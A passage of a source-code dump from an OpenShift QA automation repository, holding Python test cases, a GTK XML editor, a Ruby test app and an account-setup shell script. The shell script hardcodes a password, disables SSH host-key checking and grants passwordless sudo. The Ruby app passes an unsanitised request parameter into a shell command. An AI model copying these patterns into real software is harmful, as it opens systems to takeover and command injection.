web.assert_text_equal_by_xpath('''MANAGEMENT CONSOLE''',\n '''//div/span''')\n web.go_to_domain_edit()\n web.input_by_id('domain_name','yujzhang')\n web.click_element_by_id('domain_submit')\n time.sleep(5)\n web.assert_text_equal_by_xpath('''Namespace 'yujzhang' already in use. 
Please choose another.''',\n '''//form[@id='edit_domain_yujzhang']/ul/li''') \n\n self.tearDown()\n\n return self.passed(\"Case 122419 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_existing_domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122419.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7031700015068054, "alphanum_fraction": 0.7175792455673218, "avg_line_length": 22.931034088134766, "blob_id": "f20ade57002be10c0615add14e22f13986e59094", "content_id": "845e051fece80767e0a0fb63d0e62bdcda64c99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 694, "license_type": "no_license", "max_line_length": 106, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_with_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_without_jenkins import NodeJSHotDeployWithoutJenkins\n\nclass NodeJSHotDeployWithJenkins(NodeJSHotDeployWithoutJenkins):\n\n def __init__(self, config):\n NodeJSHotDeployWithoutJenkins.__init__(self, config)\n self.config.jenkins_is_needed = True\n self.config.summary = \"[US2747][RT]Hot deployment support for application - with Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSHotDeployWithJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6038960814476013, "alphanum_fraction": 0.6127508878707886, "avg_line_length": 25.46875, "blob_id": "b47e8dafb7db04912671a6dfcafbe8f1a73c4dfd", "content_id": "5065c8c56de9dcded87e0233ec0b365146685d9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1694, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/automation/open/testmodules/RT/limits/quota.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nAug 2, 2012\n\"\"\"\nimport rhtest\nimport common\nimport re\nimport OSConf\n\nclass QuotaTest(rhtest.Test):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n\n def log_info(self, message):\n self.info('=' * 80)\n self.info(message)\n self.info('=' * 80)\n\n def initialize(self):\n self.application_name = common.getRandomString()\n self.application_type = common.app_types['php']\n self.summary = '[US1851][Runtime][rhc-node] View Quota info'\n\n def finalize(self):\n pass\n \n def test_method(self):\n self.log_info('Creating an application')\n common.create_app(\n self.application_name,\n self.application_type,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n clone_repo = False\n )\n\n self.log_info(\"Running command 'quota'\")\n ( ret_code, ret_output ) = common.run_remote_cmd(self.application_name, 'quota')\n self.info('Asserting that the return code of the command is 0...')\n self.assert_equal(ret_code, 0)\n self.info('Verifyting the correct output...')\n uuid = OSConf.get_app_uuid(self.application_name)\n match = re.match('Disk quotas for user %s' % uuid, 
ret_output)\n        self.assert_true(match != None)\n\n        # Everything is OK\n        self.passed(self.summary)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(QuotaTest)\n    #### user can add multiple sub tests here.\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.4961051642894745, "alphanum_fraction": 0.5111976861953735, "avg_line_length": 27.720279693603516, "blob_id": "40b506a95365a2149cf1f7c33b11209bb8d45a36", "content_id": "f1c547e3047e01b682029469bab228ccfb8cb551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4108, "license_type": "no_license", "max_line_length": 94, "num_lines": 143, "path": "/automation/open/bin/setup_unix_account.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# [email protected] 2012\n#\n#\n# This script helps to have multiple accounts which can run only ONE job at a time \n# - because of conflicts with .openshift/express.conf\n# Just run it locally with new_username and remote_host as arguments.\n\n####################################################################################3\n####################################################################################3\n####################################################################################3\n#1. scp this job to remote station\n####################################################################################3\n####################################################################################3\n####################################################################################3\n\n\nif [ -z \"$2\" ]; then\n    echo \"Usage: $0 <USER> <REMOTE_HOST>\"\n    exit 2\nfi\n\nSSH_KEY=jenkins.pub\nif [ ! 
-f ~/.ssh/$SSH_KEY ]; then\n    echo \"Missing SSH key ~/.ssh/$SSH_KEY for accessing this node...\"\n    exit 3\nfi\n\nHOST=$2\n: ${HOST:=localhost}\nSCRIPT_NAME=setup_testing_account.sh\nSCRIPT=/tmp/$SCRIPT_NAME\ncat <<JOB >$SCRIPT\necho \"Creating an OpenShift QA testing user $1 ...\"\n\n#set -e\n\nif [ \"\\$UID\" != \"0\" ]; then\n    echo \"You must be ROOT to run this script\"\n    exit 2\nfi\n\nadduser $1 || exit\necho \"setup 'redhat' password...\"\nmkdir -p /home/$1\nchown $1:$1 /home/$1\nexpect <<PASSWD\nspawn passwd $1\nexpect {\n    password: {send \"redhat\\r\" ; exp_continue}\n    eof exit\n}\nPASSWD\n\ncat <<'EOF' >/home/$1/run_as_user.sh\n#!/bin/sh\n\ncd /home/$1\n\nmkdir -p /home/$1/.ssh\nmkdir -p /home/$1/.openshift || exit\nexport RHTEST_HOME=/home/$1/openshift/\necho \"Setting RHTEST_HOME to \\$RHTEST_HOME\"\ncp /tmp/.awscred /home/$1/.awscred\n#\n#OpenShift\n#\ncat <<'EOF0' >/home/$1/.openshift/express.conf\nlibra_server=int.openshift.redhat.com\n# Default rhlogin to use if none is specified\[email protected]\nEOF0\n\ncat <<'EOF1' >/home/$1/.openshiftrc\nexport RHTEST_HOME=/home/$1/openshift/\nexport PYTHONPATH=\\${RHTEST_HOME}/lib/supports:\\${RHTEST_HOME}/lib:\\${RHTEST_HOME}/testmodules\nexport PATH=\\${RHTEST_HOME}/bin:\\$PATH\nexport OPENSHIFT_libra_server='int.openshift.redhat.com'\nexport [email protected]\nexport OPENSHIFT_user_passwd=redhat\nEOF1\n\necho \"SSH setup...\"\ncat <<EOF2 >/home/$1/.ssh/config\n\nHost *.rhcloud.com\n    IdentityFile ~/.ssh/id_rsa\n    VerifyHostKeyDNS yes\n    StrictHostKeyChecking no\n    UserKnownHostsFile ~/.ssh/openshift_known_hosts\n\nEOF2\n\ncat /tmp/$SSH_KEY >>/home/$1/.ssh/authorized_keys\nchmod 600 /home/$1/.ssh/config\n\necho \"GIT setup...\"\ngit config --global user.name \"jenkins+$1\"\ngit config --global user.email \"[email protected]\"\n\n#echo \"CRON setup...\"\n#echo \"* * * * * /usr/local/bin/whatever.sh\" | crontab -\n\necho \"RHTEST setup...\"\nURL=\"git://qe-git.englab.nay.redhat.com/hss-qe/openshift/openshift-express/automation\"\nmkdir -p \\$RHTEST_HOME\ngit clone \\$URL \\$RHTEST_HOME\nEOF\n\ncp ~/.ssh/$SSH_KEY /tmp\nchmod +x /home/$1/run_as_user.sh\necho \"Run as the '$1' user...\"\npushd /home/$1\nsudo -u $1 /home/$1/run_as_user.sh\nrm -f /home/$1/run_as_user.sh\npopd\n\n[ -f /home/$1/.ssh/authorized_keys ] || echo \"Warning: Missing authorized_keys file\"\n\necho \"Add wheel group to sudoers\"\nsed -i -e 's/#.*%wheel.*$/%wheel ALL=(ALL) NOPASSWD: ALL/' /etc/sudoers\necho \"Add user to wheel group\"\nusermod -aG wheel $1\n\nJOB\necho \"Copying the ssh key\"\nscp ~/.ssh/$SSH_KEY root@$HOST:\necho \"Copying the script...\"\nscp $SCRIPT root@$HOST:$SCRIPT\n\n####################################################################################3\n####################################################################################3\n####################################################################################3\n#2. 
Run this script\n####################################################################################3\n####################################################################################3\n####################################################################################3\n\necho \"Run 'chmod +x ...'\"\nssh root@$HOST chmod +x $SCRIPT\necho \"Run the script...\"\nssh -t root@$HOST $SCRIPT\n\n" }, { "alpha_fraction": 0.4980921745300293, "alphanum_fraction": 0.5031797289848328, "avg_line_length": 36.167274475097656, "blob_id": "24749c7f178e4b21c1d84b471a9debc9006a7fdb", "content_id": "d0cba700f88e5f71aab549b0315b24ef001cf0f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10221, "license_type": "no_license", "max_line_length": 144, "num_lines": 275, "path": "/automation/open/testmodules/RT/scaling/scaling_support.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\nfrom common import consts\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\nimport re\n# user defined packages\nimport openshift\nimport fileinput\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.config.test_variant\n except:\n self.test_variant = 'python'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = './' + self.app_name\n common.env_setup()\n self.steps_list = []\n self.domain_name = common.get_domain_name()\n \n def finalize(self):\n pass\n\nclass ScalingSupport(OpenShiftTest):\n def configure_scale_up_test_application(self):\n if self.test_variant == \"php\":\n #\n # PHP\n #\n new_file = open(self.git_repo + \"/php/gear.php\", \"w\")\n new_file.write(\"<?php\\n\")\n new_file.write(\"header(\\\"Content-Type: text/plain\\\");\\n\")\n new_file.write(\"echo $_ENV[\\\"OPENSHIFT_GEAR_DNS\\\"];\\n\")\n new_file.write(\"?>\")\n new_file.close()\n elif self.test_variant == \"nodejs\":\n #\n # NODEJS\n # Only gear usage testing so far\n #\n try:\n for line in fileinput.input(self.git_repo + \"/server.js\", inplace = 1):\n if re.search(\"Routes for /health\", line):\n print \" self.routes['/gear.js'] = function(req, res) {\"\n print \" res.send(process.env.OPENSHIFT_GEAR_DNS, {'Content-Type': 'text/plain'});\"\n print \" };\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n #\n # Rack\n # Only gear usage testing so far\n #\n try:\n for line in fileinput.input(self.git_repo + \"/config.ru\", inplace = 1):\n if re.search(\"map '/health' do\", line):\n print \"map '/gear.rb' do\"\n print \" gear_dns = proc do |env|\"\n print \" [ 200, { 'Content-Type' => 'text/plain'}, ENV['OPENSHIFT_GEAR_DNS'] ]\"\n print \" end\"\n print \" run gear_dns\"\n print \"end\"\n print\n print line\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n elif self.test_variant in (\"jbossas\", \"jbosseap\"):\n #\n # JBOSS\n #\n gear_file = open(self.git_repo + \"/src/main/webapp/gear.jsp\", \"w\")\n gear_file.write(\"<%@ page 
contentType=\\\"text/plain\\\" language=\\\"java\\\" import=\\\"java.sql.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"javax.naming.*\\\" %>\\n\")\n gear_file.write(\"<%@ page import=\\\"java.util.*\\\" %>\\n\")\n gear_file.write(\"<%@ page trimDirectiveWhitespaces=\\\"true\\\" %>\\n\")\n gear_file.write(\"<%\\n\")\n gear_file.write(\"Map map = System.getenv();\\n\")\n gear_file.write(\"out.print(map.get(\\\"OPENSHIFT_GEAR_DNS\\\"));\\n\")\n gear_file.write(\"%>\\n\")\n gear_file.close()\n elif self.test_variant == \"perl\":\n #\n # Perl\n #\n gear_file = open(self.git_repo + \"/perl/gear.pl\", \"w\")\n gear_file.write(\"#!/usr/bin/perl\\n\")\n gear_file.write(\"print 'Content-type: text/plain\\r\\n\\r\\n';\")\n gear_file.write(\"print $ENV{'OPENSHIFT_GEAR_DNS'};\")\n gear_file.close()\n elif self.test_variant in (\"python\", \"wsgi\",\"python-2.7\",\"python-3.3\"):\n #\n # Python\n #\n try:\n print \"H %s\" % (self.git_repo + \"/wsgi/application\")\n for line in fileinput.input(self.git_repo + \"/wsgi/application\", inplace = 1):\n if re.search(\"PATH_INFO.+/env\", line):\n print \" elif environ['PATH_INFO'] == '/gear.py':\"\n print \" response_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n #print \"\\telif environ['PATH_INFO'] == '/gear.py':\"\n #print \"\\t\\tresponse_body = os.environ['OPENSHIFT_GEAR_DNS']\"\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n return 1\n finally:\n fileinput.close()\n\n configuration_steps = [\n \"cd %s\" % ( self.git_repo ),\n \"git add .\",\n \"git commit -a -m testing_gears_and_sessions\",\n \"git push\"\n ]\n\n return common.command_get_status(\" && \".join(configuration_steps))\n\n def number_of_gears(self):\n time.sleep(30)\n app_url = OSConf.get_app_url(self.app_name)\n gears = list()\n suffix = {\n \"php\" : \".php\",\n \"nodejs\" : '.js',\n \"ruby\" : \".rb\",\n \"ruby-1.9\" : \".rb\",\n \"rack\" : \".rb\",\n \"jbossas\" : \".jsp\",\n \"jbosseap\" : \".jsp\",\n \"perl\" : \".pl\",\n \"python\" : \".py\",\n \"wsgi\" : \".py\",\n \"python-3.3\" : \".py\",\n \"python-2.7\" : \".py\",\n }\n\n # Checking the output of gear dns script more times\n\t#print \">>>\"*30\n\t#print \"app_url : %s\"%app_url\n\t#print \"<<<\"*30\n for i in range(1, 11):\n gear = common.fetch_page(app_url + \"/gear\" + suffix[self.test_variant])\n #let's check the format\n re_str=\".com\"\n #if self.config.options.run_mode == 'OnPremise':\n # #re_str=\"example.com\"\n # re_str=\"osetestv2.com\"\n #else:\n # re_str=\"rhcloud.com\"\n #print \"**>>\"*30\n #print \"gear : %s\"%gear\n #print \"**<<\"*30\n\n if re.search(r\".*%s$\"%(re_str), gear):\n if gear not in gears:\n self.info(\"GEAR: [%s]\"%gear)\n gears.append(gear)\n\n\t#print \">>**\"*30\n\t#print \"gears : %s\"%gears\n\t#print \"<<**\"*30\n return len(gears)\n\n\n def test_method(self):\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Creating a scalable application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.user_email, self.user_passwd, True, self.git_repo, True ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0\n ))\n self.steps_list.append(testcase.TestCaseStep(\n \"Scaling up via REST API\",\n common.scale_up,\n function_parameters = [ self.app_name, self.domain_name ],\n expect_description = \"The application must scale-up successfully\",\n expect_return = 0\n ))\n\n for operation in [ \"stop\", \"restart\", \"reload\", \"force-stop\", \"start\" ]:\n 
self.steps_list.append(testcase.TestCaseStep(\n                \"Checking operation '%s'\" % operation,\n                \"rhc app %s %s -l %s -p '%s' %s\" % ( operation, self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n                expect_description = \"Operation must be successful\",\n                expect_return = 0\n            ))\n\n        # Checking web-page availability with refreshing\n        for i in range(1,6):\n            self.steps_list.append(testcase.TestCaseStep(\n                \"Checking web-page #%d\" % ( i ),\n                common.check_web_page_output,\n                function_parameters = [ self.app_name ],\n                expect_description = \"The application must be available in the browser\",\n                expect_return = 0))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Configuring the test application\",\n            self.configure_scale_up_test_application,\n            expect_description = \"The application must be configured successfully\",\n            expect_return = 0\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Checking the number of gears\",\n            self.number_of_gears,\n            expect_description = \"The number of gears must be '2'\",\n            expect_return = 2\n        ))\n\n        self.steps_list.append(testcase.TestCaseStep(\n            \"Scaling down via REST API\",\n            common.scale_down,\n            function_parameters = [ self.app_name, self.domain_name],\n            expect_description = \"The application must scale-down successfully\",\n            expect_return =0 \n        ))\n        \n        self.steps_list.append(testcase.TestCaseStep(\n            \"Checking web-page availability\",\n            common.check_web_page_output,\n            function_parameters = [ self.app_name ],\n            expect_description = \"The application must be available in the browser\",\n            expect_return = 0\n        ))\n\n        case= testcase.TestCase(\"Scaling support\", self.steps_list)\n        case.run()\n        \n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n        \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(ScalingSupport)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.6402266025543213, "alphanum_fraction": 0.6480169892311096, "avg_line_length": 25.129629135131836, "blob_id": "b96f4a7f1e13632a1fa463152e4b96e92c81ccf1", "content_id": "9e878fabc0725c4de4248672293064644303490b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1412, "license_type": "no_license", "max_line_length": 128, "num_lines": 54, "path": "/automation/open/testmodules/RT/security/selinux_pre_check_devenv.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n    ITEST=\"DEV\"\n    def initialize(self):\n        self.summary=\"[integration][rhc-selinux]SELinux separation - devenv pre check\"\n        self.info(self.summary)\n        common.env_setup()\n\nclass SELinuxPreCheck(OpenShiftTest):\n    def test_method(self):\n        self.info(\"check_selinux_status\")\n        (ret, output) = common.run_remote_cmd_as_root(\"sestatus\")\n        self.assert_match(['SELinux status:.*enabled', 'Current mode:.*enforcing', 'Mode from config file:.*enforcing'], output)\n        self.assert_equal(ret, 0)\n\n        self.info(\"Get semodule list\")\n        (ret, output) = common.run_remote_cmd_as_root(\"semodule -l|grep libra\")\n        self.assert_match('libra', output)\n        self.assert_equal(ret, 0)\n\n        self.info(\"Check audit service\")\n        (ret, 
output) = common.run_remote_cmd_as_root(\"service auditd status\")\n self.assert_equal(ret, 0)\n self.assert_match(['auditd .* is running...'], output)\n\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SELinuxPreCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6784810423851013, "alphanum_fraction": 0.6845569610595703, "avg_line_length": 24.477418899536133, "blob_id": "322c280c2af97d530393fee2085a06194ddc9f1c", "content_id": "0e18eb70a97488e01269dbcde5b1ce08fe05983e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3950, "license_type": "no_license", "max_line_length": 93, "num_lines": 155, "path": "/automation/open/lib/supports/XML/xmleditor.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nThe xmleditor module defines a GUI tool to edit an XML tree. Changes are\nautomatically saved. \n\nxmledit = XMLEditor(xmlfile)\nmainloop()\n\n\"\"\"\n\n# modified from the pygtk ide/browse module.\n\nimport os\nfrom gtk import *\n\nimport xmltools\n\nclass BrowseTreeItem(GtkTreeItem):\n\tdef __init__(self, name, dict=None, disp=None):\n\t\tGtkTreeItem.__init__(self, name)\n\t\tself.name = name\n\t\tself.dict = dict\n\t\tself.disp = disp\n\t\tself.exp_id = self.connect(\"expand\", self.sig_expand)\n\tdef init_subtree(self):\n\t\tif type(self.dict) is type(self.__dict__):\n\t\t\tself.subtree = GtkTree()\n\t\t\tself.subtree.set_selection_mode(SELECTION_BROWSE)\n\t\t\tself.subtree.connect(\"select_child\", self.subsel_child)\n\t\t\tself.set_subtree(self.subtree)\n\t\t\tself.subtree.show()\n\tdef subsel_child(self, _t, _c):\n\t\tif self.disp: \n\t\t\tkey = _c.children()[0].get()\n\t\t\tvalue = self.dict[key]\n\t\t\tif type(value) is not type(self.__dict__):\n\t\t\t\tprint xmltools.node2path(value)\n\t\t\t\tif value.childNodes: # has a value \n\t\t\t\t\tself.disp.set_text(str(value.childNodes[0].nodeValue))\n\t\t\t\telse:\n\t\t\t\t\tself.disp.set_text(\"\")\n\t\t\t\t# stash the node in the Entry in case it is edited\n\t\t\t\tself.disp.set_data(\"node\", value)\n\t\t\telse:\n\t\t\t\tself.disp.set_text(\"\")\n\t\t\t\tself.disp.set_data(\"node\", None)\n\tdef sig_expand(self, _t):\n\t\tkeys = self.dict.keys()\n\t\tkeys.sort()\n\t\tfor key in keys:\n\t\t\tdict = None\n\t\t\ttry:\n\t\t\t\tdict = self.dict[key]\n\t\t\texcept TypeError:\n\t\t\t\tpass\n\t\t\titem = BrowseTreeItem(key, dict, self.disp)\n\t\t\tself.subtree.append(item)\n\t\t\titem.init_subtree()\n\t\t\titem.show()\n\t\tself.disconnect(self.exp_id)\n\nclass BrowseVariables(GtkVBox):\n\tdef sig_entry_activate(self, disp): # change value\n\t\tnode = disp.get_data(\"node\")\n\t\tif node:\n\t\t\tif node.childNodes: \n\t\t\t\ttextnode = node.childNodes[0] # minidom has a strange API...\n\t\t\t\ttextnode.deleteData(0, textnode.length)\n\t\t\t\ttextnode.appendData(disp.get_text())\n\t\t\telse: # no existing value node, so add one\n\t\t\t\tnode.appendChild(xmltools.minidom.Text(disp.get_text()))\n\t\t\tself.dom.set_dirty()\n\tdef __init__(self, dom):\n\t\tGtkVBox.__init__(self)\n\t\tself.set_spacing(2)\n\t\tself.dom = dom\n\n\t\tself.sw = GtkScrolledWindow()\n\t\tself.sw.set_usize(300, 200)\n\t\tself.sw.set_policy(POLICY_AUTOMATIC, 
POLICY_AUTOMATIC)\n\t\tself.pack_start(self.sw)\n\t\tself.sw.show()\n\n\t\tself.disp = GtkEntry()\n\t\tself.disp.set_editable(TRUE)\n\t\tself.disp.connect(\"activate\", self.sig_entry_activate)\n\t\tself.pack_start(self.disp, expand=FALSE)\n\t\tself.disp.show()\n\n\t\tself.root_tree = GtkTree()\n\t\tself.sw.add_with_viewport(self.root_tree)\n\t\tself.root_tree.show()\n\n\t\tself.browse = BrowseTreeItem(os.path.basename(dom.filename), dom.get_xml_dict(), self.disp)\n\t\tself.root_tree.append(self.browse)\n\t\tself.browse.init_subtree()\n\t\tself.browse.show()\n\n\nclass BrowseWindow(GtkWindow):\n\tdef __init__(self, dom):\n\t\tGtkWindow.__init__(self)\n\t\tself.set_title(\"Browse Window\")\n\n\t\tbox = GtkVBox()\n\t\tself.add(box)\n\t\tbox.show()\n\n\t\tbrowse = BrowseVariables(dom)\n\t\tbrowse.set_border_width(10)\n\t\tbox.pack_start(browse)\n\t\tbrowse.show()\n\t\t\n\t\tseparator = GtkHSeparator()\n\t\tbox.pack_start(separator, expand=FALSE)\n\t\tseparator.show()\n\n\t\tbox2 = GtkVBox(spacing=10)\n\t\tbox2.set_border_width(10)\n\t\tbox.pack_start(box2, expand=FALSE)\n\t\tbox2.show()\n\n\t\tbutton = GtkButton(\"Close/Save\")\n\t\tbox2.pack_start(button)\n\t\tbutton.set_flags(CAN_DEFAULT)\n\t\tbutton.grab_default()\n\t\tbutton.show()\n\t\tself.close_button = button\n\n\nclass XMLEditor(object):\n\tdef _cleanup(self, button):\n\t\tif self.doc.dirty:\n\t\t\tself.doc.write()\n\t\tmainquit()\n\tdef __init__(self, xmlfile):\n\t\tself.doc = xmltools.XMLDocument(xmlfile)\n\t\tself.win = BrowseWindow(self.doc)\n\t\tself.win.set_title(os.path.basename(xmlfile).title())\n\t\tself.win.connect(\"destroy\", mainquit)\n\t\tself.win.connect(\"delete_event\", mainquit)\n\t\tself.win.close_button.connect(\"clicked\", self._cleanup)\n\t\tself.win.show()\n\t\n\tdef run(self):\n\t\tmainloop()\n\ndef run_editor(filename):\n\txmledit = XMLEditor(filename)\n\txmledit.run()\n\n\nif __name__ == '__main__':\n\timport sys\n\trun_editor(sys.argv[1])\n\n" }, { "alpha_fraction": 0.5448225140571594, "alphanum_fraction": 0.5565313100814819, "avg_line_length": 22.283018112182617, "blob_id": "dfec2a25549a7a05f2bcc35f7a48343ac8668dcc", "content_id": "6426495e23ea723ec5aa067c0e68573bd7cb6876", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 93, "num_lines": 53, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/config.ru", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# contents of 'config.ru'\nrequire 'rubygems'\nrequire 'bundler'\n\nBundler.require\n\nmap '/' do\n  \"[rhc-cartridge]snapshot/restore big data to new app\"\nend\n\nmap '/create' do\n  begin\n    size = request.params().fetch(\"size\", \"300\")\n    cmd = \"dd if=/dev/urandom of=#{ENV['OPENSHIFT_DATA_DIR']}bigfile bs=1M count=#{size}\"\n    ret = system(cmd)\n    if ret == true\n      msg = \"The bigfile has been created.\"\n    else\n      msg = \"Failed to create bigfile under OPENSHIFT_DATA_DIR\"\n    end\n  end\n  \"Command: #{cmd}<br />#{msg}\"\nend\n\nmap '/delete' do\n  begin\n    cmd = \"rm -f #{ENV['OPENSHIFT_DATA_DIR']}bigfile\"\n    ret = system(cmd)\n    if ret == true\n      msg = \"The bigfile has been deleted.\"\n    else\n      msg = \"Failed to delete the bigfile\"\n    end\n  end\n  \"Command: #{cmd}<br />#{msg}\"\nend\n\nmap '/show' do\n  begin\n    cmd = \"ls -lh #{ENV['OPENSHIFT_DATA_DIR']}bigfile\"\n    ret = system(cmd)\n    output = `#{cmd}`\n    if ret == true\n      msg = \"The bigfile exists.\"\n    else\n      msg = \"The bigfile does not exist.\"\n    end\n  
end\n \"Command: #{cmd}<br />#{output}<br />#{msg}\"\nend\n\n\nrun Sinatra::Application\n" }, { "alpha_fraction": 0.6682808995246887, "alphanum_fraction": 0.694915235042572, "avg_line_length": 21.509090423583984, "blob_id": "3f7a3dd6540e77356a97148fe6e4b69c6ddd5f34", "content_id": "0c5e302dad142be344c2244d163a45591ad47e48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1239, "license_type": "no_license", "max_line_length": 139, "num_lines": 55, "path": "/automation/open/testmodules/UI/web/case_174984.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174984.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass LoginWithOpenshiftUserAndPasswordOfRHNAccount(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login_new(web.username_both_registered_openshift_account,web.password_both_registered_RHN_account)\n\n web.assert_text_equal_by_xpath(\"The supplied login or password was invalid.\",\"//div[@id='content']/div/div/div/div/div/form/ul/li\")\n\n\n\n self.tearDown()\n\n return self.passed(\" case_174984--LoginWithOpenshiftUserAndPasswordOfRHNAccount passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(LoginWithOpenshiftUserAndPasswordOfRHNAccount)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174984.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5379989743232727, "alphanum_fraction": 0.5490020513534546, "avg_line_length": 46.95092010498047, "blob_id": "8aeef5d528bd6096800d5915b26a67cec1cd6262", "content_id": "2772c41967c45849b88d2988ee1de0f81f581979", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7816, "license_type": "no_license", "max_line_length": 211, "num_lines": 163, "path": "/automation/open/testmodules/RT/cartridge/add_remove_jenkins_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US1178 & US1034] [rhc-cartridge] Add/Remove jenkins client for user app \nhttps://tcms.engineering.redhat.com/case/122367/\n\"\"\"\n\nimport rhtest\nimport common\nfrom shutil import rmtree\nimport fileinput\nimport re\nimport OSConf\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing self.config.test_variant, using `zend` as default\")\n self.test_variant='jbossews-2.0'\n #self.test_variant='zend'\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(7)\n self.jenkins_name = \"jenkins\" + common.getRandomString(5)\n self.git_repo = \"./%s\" % (self.app_name)\n self.app_type = common.app_types[self.test_variant]\n common.env_setup()\n self.random_string = common.getRandomString()\n self.random_string2 